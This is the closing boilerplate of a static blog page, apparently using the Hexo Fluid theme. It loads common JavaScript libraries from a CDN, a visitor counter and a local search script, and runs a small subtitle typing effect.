  <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4.3.1/anchor.min.js" ></script>



  <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2.0.8/dist/clipboard.min.js" ></script>



  <script  src="/js/local-search.js" ></script>



  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>




  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2.0.12/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>












  

  

  

  

  

  





<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>


</body>
</html>
